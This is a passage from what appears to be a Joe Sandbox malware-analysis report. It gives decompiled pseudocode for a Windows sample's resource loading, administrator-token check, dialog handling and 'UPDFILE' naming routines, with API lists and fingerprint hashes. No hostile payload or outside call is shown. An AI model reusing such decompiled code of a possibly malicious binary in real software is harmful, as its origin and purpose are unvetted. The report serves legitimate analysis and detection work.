                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: dd0bf9c5403da650351e66c81cfcb1d571e176f881d1105bd4d1a866b2db3d1f
                                                                                                                                                                                                                                              • Instruction ID: cf4e3c0cc87ff64fb148694de8c2699f18556a2e794df76bbb0d2e56b9e31ba7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd0bf9c5403da650351e66c81cfcb1d571e176f881d1105bd4d1a866b2db3d1f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601A9362442117BF32077E56C4DF6B7E3CDBDAF51F080425FA4997190D971885287B6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E00A817EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0xa8a288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}


                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A818DD), ref: 00A8181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A8182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00A818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A818DD), ref: 00A81855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,00A818DD), ref: 00A81883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A818DD), ref: 00A8188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 3ceed05b81fb8c9583402d8f3a84b58604509b1c43e71f33bd5685275180734b
                                                                                                                                                                                                                                              • Instruction ID: 0d93d2c83bf3db8e1ec16b4b1e4f145140817f8850bbd2142fc95f34d90e7752
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ceed05b81fb8c9583402d8f3a84b58604509b1c43e71f33bd5685275180734b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9116671E00209AFEB10EFE4DC4AABEBB78FF44701F10056AFA05E6290DA719D068791
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E00A843D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0xa89404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa891dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A83490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A8349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A834B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 00A834C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00A834CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00A834D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: d33fb6efd9b121e0b6c31fd3ce2abe8a63f59e16dfcda8c68f28237aaaee7ddb
                                                                                                                                                                                                                                              • Instruction ID: aaaff34b1ab22a105d6ee60d7d921d989c2a95c553eb302ed7c8fe164eac000e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d33fb6efd9b121e0b6c31fd3ce2abe8a63f59e16dfcda8c68f28237aaaee7ddb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE01B132240114ABEF56BFA5DC0C96E3E64EB09F12F004511F947865A0CB709F52CB85
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0xa89a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A81680(_t65, E00A817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E00A865E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E00A81680(_t65, E00A817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00a82b87
                                                                                                                                                                                                                                              0x00a82bbf
                                                                                                                                                                                                                                              0x00a82bc1
                                                                                                                                                                                                                                              0x00a82bc1
                                                                                                                                                                                                                                              0x00a82b26
                                                                                                                                                                                                                                              0x00a82bda
                                                                                                                                                                                                                                              0x00a82bda
                                                                                                                                                                                                                                              0x00a82be6
                                                                                                                                                                                                                                              0x00a82be6
                                                                                                                                                                                                                                              0x00a82bf8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A82AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A82AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00A82B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 00A82B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 00A82B55
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00A82BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 7d6440228a8df85bda4531755c8825f73dc629034651cad78e161f5b5c486f20
                                                                                                                                                                                                                                              • Instruction ID: b12c8944c907637a7920ad9add9a994ff7d05c4af9039c66e997e95f67b25223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6440228a8df85bda4531755c8825f73dc629034651cad78e161f5b5c486f20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 274103345052855EEB15BF348C58BFE7BB99F66310F18419AE8C287202DB358E87CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              0x00a84463
                                                                                                                                                                                                                                              0x00a84463
                                                                                                                                                                                                                                              0x00a8447a
                                                                                                                                                                                                                                              0x00a84481
                                                                                                                                                                                                                                              0x00a84484
                                                                                                                                                                                                                                              0x00a8448a
                                                                                                                                                                                                                                              0x00a84492
                                                                                                                                                                                                                                              0x00a84496
                                                                                                                                                                                                                                              0x00a84496
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a844b8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A843F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A8440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00A84423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A8442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A8443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A84447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A844A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: bcd555bdf411216c044ab4c1b0df1fbfd6d7fa900956562bbd0761d22214f249
                                                                                                                                                                                                                                              • Instruction ID: e637d65dd72cbb5022eab4d2ff518f83e00fccb00e4053fdf9cf46f6e0a9c53e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd555bdf411216c044ab4c1b0df1fbfd6d7fa900956562bbd0761d22214f249
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86314C72E00119AFDB14DFF8DD899EEBBB5EB89310F154269F805F7250DA70AD068B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E00A86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E00A8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
